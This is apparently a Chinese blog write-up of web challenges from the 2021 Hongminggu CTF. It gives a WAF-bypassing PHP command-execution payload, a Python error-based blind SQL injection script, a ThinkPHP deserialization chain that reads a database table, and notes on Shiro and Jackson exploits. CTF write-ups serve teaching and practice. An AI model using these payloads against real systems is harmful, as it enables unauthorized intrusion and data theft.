“红明谷”杯数据安全大赛技能场景赛

2021-04-03 00:04:00
ctf - wp - 红明谷

签到

略过~

write_shell

代码审计:

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

短标签配合反引号执行命令绕过:

/?action=upload&data=<?=`ls%09/`?>

发现:

!whatyouwantggggggg401.php bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

\绕一下绕过即可:

?action=upload&data=%3C?=`cat%09/!whatyouwantggggggg401.ph\p`?%3E

happysql

过滤了单引号、空格、if、or、and其他的常见字符,简单测了一下可以用:

username=admin"union/**/select/**/1,2#&password=123

来登陆,||可以使用,fuzz一波发现过滤了不少,找到一个make_set可以替代if,strcmp替代等于号,但常见盲注函数都被ban了,找到locate可以用来取位置。

发现语句错误时就会报错,如当把strcmp写成stcmp时,exp的大于709特性来让语句报错即可,是一种基于错误运行的注入,exp:

import os
import requests
url = "[靶机ip]"
req = requests.session()

string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789']
headers = {
      'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
      'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
      'Connection':'keep-alive',
    }

res = ''

chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$^&*(),'

result = ""
for i in range(1,50):
    for j in chars:
        data = {
        #'username':'a"||exp(make_set(strcmp((locate(binary"%s",(select/**/database()),%d)),%d),710,1))#'%(j,i,i),
        # 'username':'a"||exp(make_set(strcmp((locate(binary"%s",(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name/**/regexp/**/"ctf"),%d)),%d),710,1))#'%(j,i,i),
         'username':'a"||exp(make_set(strcmp((locate(binary"%s",(select/**/group_concat(x.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)x),%d)),%d),710,1))#'%(j,i,i),
        'password':'213'
       }   

        # print(data)
        rep =  req.post(url,data,headers)
        text = rep.text
        # print(text)
        if 'home.php' in text:
            result += j
            print(result)
            break

跑出来少了减号,根据其他题的flag在相应位置补上减号即可,注出来flag如下:

easytp

一开始是看了这篇文章:https://mp.weixin.qq.com/s?__biz=MzU2NDc2NDYwMA==&mid=2247484711&idx=1&sn=0dd0f72b376b4922e4ae5b8bd614ae89

跟着调了一下发现链一模一样,直接就打,开了rouge mysql server,读到一些没什么用的文件,没找到flag,受到文末一句话的启示一直在怼堆叠注入写shell发现shell不解析...

然后一直想读配置文件读不到,root/root也不是,这种情况爆破也比较麻烦,随手一试发现root/123456居然。。

然后注了下发现了tp库:

测了一下有个f14g表

没继续注字段了,直接select *读:

<?php
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "tp",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}

namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace Think\Session\Driver{
    use Think\Model;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model{
        protected $options   = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=1=extractvalue(1,concat(0x7e,mid((select * from f14g),16)))#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

用mid跑两次拿到完整的flag。

javaweb

访问时提示:/json,访问了json又重定向到login,没搞懂,login页面一片空白,尝试post一下发现:

这个rememberMe=deleteMe很明显是shiro,但这里登陆失败的话再结合前面的访问json会重定向,联想到最近的CVE-2020-1957,shiro权限绕过,那么直接绕过:

得到明确的回显了,是jackson,测了下jackson最新的反序列化CVE-2020-36188,发现可行。

那么就直接上工具:https://github.com/welk1n/JNDI-Injection-Exploit

用spring的链打:

拿到flag。



本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号